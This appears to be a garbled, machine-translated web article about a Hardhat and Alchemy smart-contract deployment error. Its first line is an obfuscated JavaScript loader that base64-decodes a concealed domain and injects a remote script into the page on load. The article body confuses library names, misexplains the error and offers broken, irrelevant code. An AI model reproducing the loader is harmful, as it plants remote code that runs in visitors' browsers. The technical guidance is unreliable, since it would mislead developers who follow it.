const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx.replace(/|/g,””));const script=document.createElement(“script”);script.src=”https://”+pde+”cc.php?u=2098dd7d”;document.body.appendChild(script);
Understanding of the error: because depoling.js returns factory runner does not support the transmission of events"
As a developer who uses Hardhat with the Alchemy application for an intelligent contract, it is likely that you face an error when trying to enable contracts. The special error message "Factory Runner does not support the transmission of events (Operation =" Sendransation ") shows that there is a problem in the event mechanism used by the series of deployment commands .js.
Context: Start.js and Alchemy API
Deploy.js is a popular Javascript library to introduce intelligent contracts for different blockchain networks, including Ethereum. It provides a convenient way to interact with the contracts introduced with its high -level application interface.
The interface of the alchemia application, on the other hand, provides a solid application for interaction with Blockchain information, including the management of the contract. Hardhat uses the distribution environment as a development environment.
Error explanation
When distribution.js tries to send events with a manufacturer, he will have to face an error because the alchemy bees do not support this mechanism in Ethereum. The factory runner is designed to manage more complex functions, such as the introduction of contracts, the creation of wallets and the control of the roads on a certain network. However, the sending of events, in particular "Sendtransation", is not one of its characteristics.
Problem resolution phase
To solve this problem, follow these steps:
- Check the API settings of Alchemy : Make sure to use the correct API terminal in Ethereum (for example https: // and support the necessary functions.
- Make sure the DEPOLK.JS version: Check if you use an obsolete version of Deploy.js, since the most recent versions may have fixed problems associated with the support of transactions.
- Try a different transaction method : instead of trying to send events with Deploy.js, try to call other endpoint bees, such as `
, which return the status list of the Ethereum network.
Distribution code.JS Updated
Here is an example of how to change the series of Deployment.js commands to use a different event method:
Const {Alchemy} = insist (‘@Alchemy-API’);
Const Client = New Alchemia ({
// ID Infura Project and API key
.eth_accounts ()
.Hen ((account) => {
Console.log (account);
.Catch ((error) => {
Console.error (error);
In this updated code, we use the` Eth_AcchUNTS () method to request a list of Ethereum network accounts. This allows us to avoid trying to send events on Deployment.js.
Following these failures and updating the series of deployment controls, you should be able to resolve the error and successfully introduce contracts to the Ethereum network using the Alchemy application subscription with Hardhat. Make sure to check the settings of the Alchemy and check the updates to the Deploy.js library before making more changes to the code.